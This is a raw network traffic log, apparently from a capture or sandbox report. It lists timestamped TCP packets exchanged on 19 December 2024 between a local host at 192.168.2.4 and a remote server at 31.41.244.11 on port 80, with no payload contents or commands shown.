                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.743844986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.743877888 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.744518042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.744565964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.744574070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.744610071 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.744618893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.744648933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.745417118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.745465994 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.745471001 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.745506048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.745513916 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.745548010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.746293068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.746340036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.746349096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.746383905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.746403933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.746424913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.747160912 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.747211933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.747248888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.747299910 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.747301102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.747350931 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.748083115 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.748136044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.748136997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.748179913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.748179913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.748224974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.749062061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.749095917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.749118090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.749131918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.749138117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.749239922 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.749849081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.749902010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.749903917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.749939919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.749947071 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.749988079 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.750744104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.750797987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.750832081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.750854015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.750881910 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.751647949 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.751699924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.751734972 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.751751900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.751773119 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.752559900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.752593994 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.752618074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.752628088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.752640009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.752669096 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.753417015 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.753468037 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.753472090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.753505945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.753552914 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.754312992 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.754364967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.754398108 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.754415989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.754440069 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.755219936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.755254984 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.755291939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.755306959 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.755336046 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.756108046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.756160975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.756195068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.756211996 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.756234884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.756974936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.757030964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.757067919 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.757082939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.757111073 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.757858992 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.757913113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.757947922 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.757961988 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.757991076 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.758749962 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.758804083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.758837938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.758857965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.758876085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.759645939 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.759697914 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.759697914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.759737015 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.759749889 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.759783983 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.760554075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.760606050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.760639906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.760659933 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.760683060 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.761461020 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.761513948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.761549950 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.761569023 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.761588097 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.762329102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.762624025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.762679100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.762696981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.762731075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.762780905 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.763525009 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.763581038 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.763616085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.763633966 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.763658047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.764533997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.764568090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.764604092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.764620066 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.764642000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.765299082 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.765352964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.765388012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.765407085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.765428066 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.766200066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.766267061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.766268969 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.766309977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.766316891 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.766359091 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.767074108 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.767123938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.767164946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.767199993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.767215014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.767241001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.767973900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.768024921 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.768034935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.768069983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.768115997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.768879890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.768934011 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.768968105 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.768981934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.769007921 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.769777060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.769830942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.769882917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.775388956 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.775490999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.775526047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.775676012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.775878906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.775913954 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.775938034 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.775948048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.775968075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.775994062 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.776685953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.780035973 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.933171034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.933248997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.933341980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.933420897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.933444023 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.933480024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.933487892 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.933509111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.933533907 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.934297085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.934333086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.934360027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.934367895 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.934381008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.934457064 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.935019970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.935075998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.935108900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.935122967 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.935148954 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.935667038 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.935714960 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.935762882 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.935796976 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.935806036 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.935837984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.936567068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.936621904 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.936656952 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.936667919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.937448025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.937504053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.937537909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.937612057 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.938340902 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.938394070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.938427925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.938452005 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.938472986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.939240932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.939295053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.939361095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.939363956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.940028906 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.940109968 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.940165043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.940198898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.940213919 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.940237045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.941011906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.941111088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.941145897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.941164017 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.941186905 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.941893101 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.941947937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.941982985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.942001104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.942020893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.942805052 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.942858934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.942893028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.942910910 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.942938089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.943758965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.943813086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.943849087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.943864107 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.944020033 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.944565058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.944619894 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.944653988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.944673061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.944690943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.945461035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.945513964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.945548058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.945565939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.945585966 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.946527958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.946563005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.946599007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.946611881 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.947381020 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.947417021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.947432995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.947453976 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.947459936 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.948025942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.948240995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.948276043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.948293924 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.948312998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.948318958 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.948357105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.949006081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.949057102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.949064016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.949101925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.949151039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.949897051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.949951887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.949987888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.950002909 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.950033903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.950853109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.950887918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:55.950923920 CET804986031.41.244.11192.168.2.4
